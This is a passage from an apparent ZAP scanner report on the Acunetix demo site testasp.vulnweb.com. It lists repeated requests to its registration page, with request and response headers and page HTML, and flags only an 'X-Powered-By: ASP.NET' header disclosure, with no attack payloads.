href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a 